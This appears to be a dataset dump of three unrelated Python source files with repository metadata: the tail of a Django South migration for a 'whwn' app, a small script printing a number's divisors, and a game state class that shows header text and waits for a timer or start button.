            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
            'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'primary_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_user'", 'null': 'True', 'to': "orm['auth.User']"}),
            'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
        },
        'whwn.userprofile': {
            'Meta': {'object_name': 'UserProfile'},
            'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
            'email_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
            'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
            'phone_number': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
            'phone_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['whwn.Team']", 'null': 'True'}),
            'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
        }
    }

    complete_apps = ['whwn']
|
[
"wes.vetter@gmail.com"
] |
wes.vetter@gmail.com
|
653a3160557c7d216ad359311443175691103686
|
56ba98873ad995551d00a87a7eea6f705dc52e34
|
/prom7.py
|
df50f206cca6c70e91532f0ad33f805533b45f95
|
[] |
no_license
|
xaviermaxd/python_semana8
|
b4fae081b784fc656d3292b73c6b50b50f6abfba
|
1b81e4fec9884619d1d987d131af4e314ce3bd0c
|
refs/heads/main
| 2023-08-24T08:15:48.986623
| 2021-10-21T01:53:10
| 2021-10-21T01:53:10
| 419,546,381
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 117
|
py
|
# Read an integer and print each candidate in 1..n+1 that divides it evenly
# (the range mirrors the original while-loop's iteration exactly).
n = int(input("ingrese un numero : "))
for candidate in range(1, n + 2):
    if n % candidate == 0:
        print(candidate)
|
[
"xavier.mamani@tecsup.edu.pe"
] |
xavier.mamani@tecsup.edu.pe
|
3f070fc5fe457fc3dc932efd097817205702346b
|
b2a0db27a57236a9f2f19a0004decf83fd3cdb10
|
/headertextscreen.py
|
bfcefe8d4a582055a2c7f0bd216c861cb4c35027
|
[] |
no_license
|
ajveitch/mqd
|
0180bbe824d0e5eb1a2cb287194dc5ee9dc8f8db
|
dc1f9ff627eadb2fbd18e439119f6cc1a1e2328d
|
refs/heads/main
| 2023-07-29T15:34:55.464996
| 2021-09-11T15:47:16
| 2021-09-11T15:47:16
| 403,755,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,408
|
py
|
from ui import *
from playercontroller import *
from gamerunner import NullState
class HeaderTextScreen(NullState):
    """Game state that displays a large header plus sub-text.

    Advances to ``nextState`` either after ``waitTime`` seconds (when
    waitTime > 0) or on a fresh press of the player's start button.
    """

    def __init__(self, audio, nextState, player, waitTime = 0):
        self.nextState = nextState
        # Start-button state sampled on the previous frame; -1 means "not yet
        # sampled" (properly initialized in onEnter).
        self.startButton = -1
        self.player = player
        self.big = Text(96, (255, 192, 0))    # header font and color
        self.small = Text(36, (255, 255, 255))  # sub-header font and color
        self.waitTime = waitTime  # seconds before auto-advance; 0 = wait for input
        self.currentTime = 0
        self.header = ""
        self.subHeader = ""
        self.audio = audio

    def setHeader(self, header):
        """Set the large header line."""
        self.header = header

    def setSub(self, subHeader):
        """Set the smaller sub-header line."""
        self.subHeader = subHeader

    def setNextState(self, nextState):
        """Replace the state to transition to."""
        self.nextState = nextState

    def update(self, deltaTime):
        """Advance timer/input; return the next state (may be self)."""
        if self.waitTime > 0:
            # Timed mode: accumulate elapsed time and auto-advance.
            self.currentTime = self.currentTime + deltaTime
            if self.currentTime >= self.waitTime:
                return self.nextState
        elif self.startButton == 0:
            # Input mode: only advance on a fresh press -- the button must
            # have been released (0) on the previous frame.
            start = self.player.startButton()
            if start:
                return self.nextState
        # Remember this frame's button state for the edge detection above.
        self.startButton = self.player.startButton()
        return self

    def draw(self, surface):
        """Render header and sub-header centered horizontally."""
        self.big.draw(surface, self.header, (400, 200), True)
        self.small.draw(surface, self.subHeader, (400, 300), True)

    def onEnter(self):
        """Start the pre-game music and latch the current button state."""
        self.audio.MusicPre()
        self.startButton = self.player.startButton()
|
[
"ajv-github@erkle.org"
] |
ajv-github@erkle.org
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.